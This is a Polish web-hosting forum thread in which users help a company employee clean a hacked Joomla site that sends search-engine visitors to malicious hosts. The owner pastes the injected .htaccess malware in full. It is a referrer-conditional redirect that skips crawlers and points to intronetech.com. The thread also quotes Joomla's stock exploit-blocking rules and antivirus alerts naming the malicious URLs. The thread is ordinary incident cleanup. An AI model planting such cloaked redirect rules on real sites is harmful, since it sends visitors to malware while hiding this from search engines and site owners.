Witam wszystkich jestem nowym uzytkownikiem tego forum wiec prosze o wyrozumialosc
Mam problem. Pracuje w firmie ktora ma swoja strone www postawionaq wlasnie ja jomli i od jakiegos czasu pojawil sie problem z googlami a mianowicie strona jest dodana do wyszukiwarki w googla i po wpisaniu w googlas np. seger ( bo w tej firmie pracuje www.seger.com.pl (http://www.seger.com.pl)) wyswietla sie linka do strony ale po kliknieciu w niego nie da sie wejsc na strone tj przechodzi spowrotem do googla. Zrobilo sie to niedawno. Wczesniej mielismy taki problem ze po wpisaniu sege w google i kliknieciu w link na liscie wynikow otwierala sie pusta strona ale jak sie kliknelo F5 to dopiero wtedy uruchamialas sie strona seger. Pozniej ponoc mielismy jakiegos wirusa na serwerze i home nam usunol tego wirka i od tego czasu jest taka sytuacja. Mecze sie z tym od jakiegos czasu a jestem zielony w jomli czy ma moze ktos jakies pomysly czemu tak sie dzieje i jak to naprawic ?

Bardzo prosze o pomoc.
Z gory dizekuje

u mnie działa normalnie

tj. wpisuje w google seger com pl
mam na pierwszym miejscu waszą witrynę klikam i wchodzę na stronę.
Nie dostrzegam problemu.


Hmmm. to pewnie u mnie działa dlatego że nie mam Windozy :)

Czy mogłby ktos jeszcze to potwierdzic ? Bo u mnie i na fire fox i w IE sa takie same objawy. Co ciekawsze jak wpisze adres strony w IE badz w lisa to strona sie otwiera normalnie. Tylko wchodzac przez google mam taki blad. W pracy mam NOD ESet wiec raczej wira nie mam.

Rzeczywiście, jeśli szuka się w googlach to wraca do googli, jak się wpisze adres to jest OK, dziwne ;).

No to u mnie kasper wyrzuca coś takiego


Kaspersky

Anti-Virus 2011


Dostęp zabroniony

Żądany adres nie może zostać pobrany

URL:

http://gfaster.net/se/21a49eeb8fd40def38
c24a918c9be8a78a2743a7a2416dc6cdd8329ae2
2823272acfb676dd09fcc567bc408e7727f8250e
5d20f8e67336178ec4eab09cceb8/986aab96/
seger.com
Zablokowane przez moduł Ochrona WWW

Kliknij tutaj, jeżeli uważasz, że strona internetowa została niesłusznie zablokowana. (http://touch.kaspersky.com/url_redirect/1/d32a0a133515baf3)

Powód: szkodliwy odsyłacz . (http://touch.kaspersky.com/url_redirect/1/d32a0a133515baf3)
Wychodzi więc na to że w czasie kiedy mieliście wirusa boty google zindeksowały stronę i wykryły na niej szkodliwe oprogramowanie.

Proponuję:
A. założyć konto google
B.Dodać stronę do konta
C. zweryfikować stronę i prawa własności
D.stworzyć nową mapę i dodać do strony
Jak nie zadziała - (trzeba odczekać minimum 72 godziny do tygodnia) - zgłosić stronę do ponownego rozpatrzenia
Pzdr

Mnie też przekierowuje z powrotem na google. Za pierwszym razem kasperski zabronił dostępu. Powód szkodliwy adres internetowy. Wogóle link wygląda tak:(gfaster.net) Nie podaje całości, żeby nie było w tym poście linka. Ale na 100% macie jakieś dziadostwo na serwerze, albo w joomli.

---------- Post dodany o 12:51 ---------- Poprzedni post był o 12:48 ----------

Google nie zaindeksowało jeszcze tego dziadostwa, bo przy linku byłoby ostrzeżenie - ta witryna może wyrządzić szkody na twoim komputerze, ale w indeksie byście byli, zresztą jesteście wasza witryna kieruje na gfaster.net

---------- Post dodany o 13:47 ---------- Poprzedni post był o 12:51 ----------

Tutaj być może znajdziesz odpowiedź, niestety po angielsku:
http://www.google.com/support/forum/p/Webmasters/thread?tid=0e129f9c26af812c&fid=0e129f9c26af812c00049a601f8c6947&hl=en

Dziekuje wszystki za pomoc
Mam jeszcze prozbe czy moglby ktos mi wytlumaczyc co mam zrobic tak step by step bo jesli chodzi o joomle to jestem laikiem. Wazne jest tez dla mnie a raczej firmy w ktorej pracuje aby nie stracic pozycji w googlech. Troszke pracowalismy na nia wiec sprawa zrozumiala.

Z gory dziekuje za pomoc

Kaspersky

Internet Security 2011


Dostęp zabroniony
Żądany adres nie może zostać pobrany

URL:

(httpwd://foreign0.twincities-remodeling)
com/se/21a49eeb8fd40def38c24a918c9be8a78
a2743a7a2416dc6cdd8329ae22823272acfb676d
d09fcc567bc408e7727f8250e5d20f8e67336178
ec4eab09cceb8/1ee27987/seger_com_pl.com

Zablokowane przez moduł Ochrona WWW

Powód: szkodliwy odsyłacz

Kliknij tutaj, jeżeli uważasz, że strona internetowa została niesłusznie zablokowana. (http://127.6.6.82/url_redirect/1/710e828071da0faf)




Niestety nadal nie rozwiązaliście problemu. To wyskakuje po kliknięciu w waszą stronę w goole, dobra wiadomość, to taka, że gogle na razie nie uznało, tego adresu za szkodliwy.
A zła że nikt kto ma antywirusa na waszą stronę nie wejdzie.
Mam takie pytanie podstawowe, czy robiliście, coś na hostingu, żeby zlokalizować problem?
Teraz macie jakiś inny link przyklejony szkodliwy, poprzednio był inny.
do linka dołożyłem wd bo lepiej żeby nie był aktywny

Dziekuje wszystkim za pomoc. Kontaktowalem sie z firma hostingujaca usuneli nam jednego wira ale skoro pojawil sie drugi to juz nie iwem co mam robic poza tym home nie widzi tu swojej winy.
Wiec co mam zrobic? Chce zadzwonic do home i sie znimi klocic ze to przeciez ich zadanie jest takie zeby zaden wirus sie niedostal na nasz serwer bo w koncu za to placimy. Co radzicie

Z gory dziekuje za pomoc.

Mam propozycję - Zrób pełną kopię witryny np.Akeebą - i prześlij do niej link - spróbuje wyczesać przyjemniaczka i ewentualnie wówczas Zrobisz sobie odtworzenie z akeeby całej witryny (nic nie obiecuję - mam jednak pewien pomysł i z czystej ciekawości tematu chciałbym sprawdzić czy zadziała - jak tak może się przydać innym w przyszłości).
Pzdr

Wgraj plik htaccess.txt z paczki instalacyjnej - ten usuń w całości - i przemianuj htaccess.txt na .htaccess

Jeszcze jedno zauwazylem. wszedlem na serwer gdzie jest nasza strona i w kazdym katalogu jest plik htaccess. Powinien byc tylko jeden w katalogu glownym ? reszte moge usunac? W glownym pliku mam kod szkodliwy
# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\. |excite\.|altavista\.|netscape\.|aol\.|hotbot\.|go to\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search \.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache |appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sN ews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|B logsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\ shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo| Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friend ster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDu de|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|i Phone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Lifere a|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Medi apartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchSer ver|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nut ch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenInt elligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder| Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient |Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS |Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird |Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmas ter|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Win dows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwst er|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://intronetech.com/cgi-bin/r.cgi?p=&i=5513e9c0&j=110&m=bc357605c3946d4d3f65a40e4eb3864d&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo

Nie wiem co mam z tego usunac jestem grafikiem a na stronach malo co sie znam tzn thml-a kumam ale to jest php prosze o pomoc takze w tej sprawie.

Bede zobowiazany za pomoc.

---------- Post dodany o 11:22 ---------- Poprzedni post był o 11:19 ----------

A niewystarczy ze z serwera skopiuje cala zawartosc ?? Tam jeszcze procz www jest katalgo ftp gdzie klienci maja konta i sa w nich ich pliki

---------- Post dodany o 11:24 ---------- Poprzedni post był o 11:22 ----------

na serwie mam jakiegos htaccess-a txt jego zawartosc wyglada tak

##
# @version $Id: htaccess.txt 5975 2006-12-11 01:26:33Z robs $
# @package Joomla
# @copyright Copyright (C) 2005 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##

################################################## ###
# READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations. It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file. If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's. If they work,
# it has been set by your server administrator and you do not need it set here.
#
# Only use one of the two SEF sections that follow. Lines that can be uncommented
# (and thus used) have only one #. Lines with two #'s should not be uncommented
# In the section that you don't use, all lines should start with #
#
# For Standard SEF, use the standard SEF section. You can comment out
# all of the RewriteCond lines and reduce your server's load if you
# don't have directories in your root named 'component' or 'content'
#
# If you are using a 3rd Party SEF or the Core SEF solution
# uncomment all of the lines in the '3rd Party or Core SEF' section
#
################################################## ###
##### SOLVING PROBLEMS WITH COMPONENT URL's that don't work #####
# SPECIAL NOTE FOR SMF USERS WHEN SMF IS INTEGRATED AND BRIDGED
# OR ANY SITUATION WHERE A COMPONENT's URL's AREN't WORKING
#
# In both the 'Standard SEF', and '3rd Party or Core SEF' sections the line:
# RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
# May need to be uncommented. If you are running your Joomla!/Mambo from
# a subdirectory the name of the subdirectory will need to be inserted into this
# line. For example, if your Joomla!/Mambo is in a subdirectory called '/test/',
# change this:
# RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
# to this:
# RewriteCond %{REQUEST_URI} ^(/test/component/option,com) [NC,OR] ##optional - see notes##
#
################################################## ###

## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks
#
# mod_rewrite in use
RewriteEngine On

# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla!/MamboDirectory (just / for root)
# RewriteBase /

########## Begin - Joomla! core SEF Section
############# Use this section if using ONLY Joomla! core SEF
## ALL (RewriteCond) lines in this section are only required if you actually
## have directories named 'content' or 'component' on your server
## If you do not have directories with these names, comment them out.
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
#RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$ [NC]
RewriteRule ^(content/|component/) index.php
#
########## End - Joomla! core SEF Section

########## Begin - 3rd Party SEF Section
############# Use this section if you are using a 3rd party (Non Joomla! core) SEF extension - e.g. OpenSEF, 404_SEF, 404SEFx, SEF Advance, etc
#
#RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
#RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$ [NC]
#RewriteCond %{REQUEST_FILENAME} !-f
#RewriteCond %{REQUEST_FILENAME} !-d
#RewriteRule (.*) index.php
#
########## End - 3rd Party SEF Section

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a ********** tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

czy o to chodzilo ??

Twoja wola - chciałbym natomiast zanim przekażę Ci do odtworzenia plik z akeeby sprawdzić wszystko na klonie witryny, na jednym z moich hostów.
Pzdr

No jeśli chodzi o home, to golą grubą kasę i nic nie robią. Ja za swój hosting płacę 123zł rocznie, a parametry, wcale nie gorsze jak w home, a czasami wydaje mi się, że lepsze.
Zadzwonić nie zaszkodzi, w końcu biorą pieniądze, no ale ja bym się nie kłucił tylko grzecznie poprosił, żeby zlokalizoawali przyczynę, może tak być, że to nie ich wina, bo możesz coś ciągnąć za sobą wgrywając pliki przez ftp, wieczorem będe miał trochę czasu to zerknę na waszą stronkę. Najważniejsze dla was teraz jest zlokalizowanie przyczyny.O google bym się teraz nie martwił, trzeba znaleźć przyczynę, a dopiero potem walczyć ze skutkami. Jedno jest pewne poprzedni adres to robota turecka. A oni są strasznie "upierdliwi". Poproście "HOME" aby pomogli wam znaleźć przyczynę.

Zaraz bede dzwonil do home-a tylko jak dzwonilem rano i uslyszalem ze jestem 14 w kolejce do rozmowy to mi sie odechcialo :)

Czy to tego htaccess-a txt mam przeminaowac na dobrego a tamtego usunac ??

Właśnie tak masz zrobić . Tylko ta twoja joomla strasznie stara, przydała by sie aktualizacja. No i zmień hasła na ftp, bo wygląda na to, że ktoś się ci włamuje.

@andrzejxxI0 faktycznie Masz rację z tym ftp'em - nie pomyślałem o tym - może więc kolega sprawdzi jeszcze swój local i przy okazji napisze jakiego klienta ftp używa - np. TC jest w tym przypadku bardzo podatny i nawet na forum całkiem niedawno był temat. Co do home to raczej nie liczyłbym na pomoc - parę lat temu na helpie siedzieli fachowcy - obecnie - głównie przeklejacze standaryzowanych odpowiedzi.
Od jakiegoś czasu każda dyskusja z nimi kończy się informacją o braku ich winy, lub w przypadku chat'u iż sa tylko pomocą handlową (co kłóci się z treścią informacyjną ich witryny).
Przykład - miałem problem techniczny z zachowaniem się plików o rozszerzeniach klz i klm - otrzymałem od nich odpowiedź iż ich hosting nie obsługuje tych rozszerzeń :D
- no i musiałem sam znaleźć odpowiedź w czy problem - znalazłem - wszystko hula.
Pzdr

---------- Post dodany o 11:42 ---------- Poprzedni post był o 11:37 ----------


Zaraz bede dzwonil do home-a tylko jak dzwonilem rano i uslyszalem ze jestem 14 w kolejce do rozmowy to mi sie odechcialo :)
HHYM, Ciekawe tak dobry hostingodawca - a taka długa kolejka? :podstep: Pewnie wszyscy przenoszą swoje witrynki do home.pl :D
Pzdr

wlasnie z nimi rozmawiam. oczywiscie nie ich wina tylko diur w joomla :)

wlasnie z nimi rozmawiam. oczywiscie nie ich wina tylko diur w joomla :)
To się Zapytaj jak je załatali w autoinstalatorze - no przecież to fachowcy i nie pozwoliłby sobie na ich pozostawienie:podstep:

Własnie jestem po rozmowie z home i oczywiscie to nie ich wina oni nie skanuja tego co mam serwerze w poszukiwaniu wirusow jedynie poczte skanuja a dodam ze mam opcje busines pro :)
Ale pan mi powiedzial ciekawa rzecz ze home oferuje tzn ze mam statystyki odswierzania i modyfikowania plikow i moge zobaczyc co i skad modyfikuje htaccessa wiec bede musial w gaszczu info to odnalesc. Robie wlasnie kopie strony i zraz podmienie plik htacces na orginalny tylko pewnie na zadzialanie tego bede musial troche odczekac zanim roboty googla sie zaktualizuja? Czy te inne thaccessy w innych katalogach na serwie moge usunac ? ma byc tylko jeden htacces w glownym katalogu ?

Jeszcze raz serdecznie dziekuje za wsparcie. Bez was bym sobie nieporadzil

Primo, Sprawdź czy w nich jakiś cudów nie ma.
Secundo - o tym co zrobić aby był szybki index botów pisałem w tym wątku parę postów wcześniej.
Pzdr

Panowie
Dziekuje wam bardzo za pomoc. Stronka juz smiga z googla. Dodam ze ten wirek utworzyl mi 126 plikow htaccess we wszystkich mozliwych folderach i podfolderach. Usunolem stary access i wrzucilem orginala.

Jeszcze raz serdecznie dziekuje ze taki odzew.
Pozdrawiam

Kolego - to za teraz zajmij się zabezpieczeniem swojej witryny - szukajka i hulaj po forum - trochę tego było.
Pzdr

Właśnie jak @Gal Anonim napisał. Bo ktoś mu hula po serwerze jak po swoim , a więc troche nad bezp. trzeba popracować prawa plików, zmiana haseł, itd. No a tak na marginesie to bardzo się cieszę, że uciekłem z home zaraz po testach. Bo najgorzej jak ktoś człowieka czyt: "własnego klienta" traktuje jak konieczne zło. No i te htaccesy w innych katalogach też bym obejżał, bo czysta joomla ma tylko jeden, ale nie wiem jak w home jest, może tam zabezpieczają inne katalogi joomli.

@Gal Anonim google prawdopodobnie odrzuci, bo strona jest zainteksowana, no chyba, żeby wysłał mape witryny, ale mapy to oni dodają też według własnego uznania. Może napisać prośbę o usunięcie danego wpisu z wyszukiwarki, motywując to dobrze. Mi ostatnio taką prośbę rozpatrzyli, bo ktoś wpisał stronę do katalogu str. porno i usunęli ten wpis z pam. google. Ale zatytyłowałem tą prośbę"Skarga na google" i dali mi bana na moją stronkę jeden dzień w indeksie 500 stron a na drugi 80 i tak od tygodnia.
Pozdr.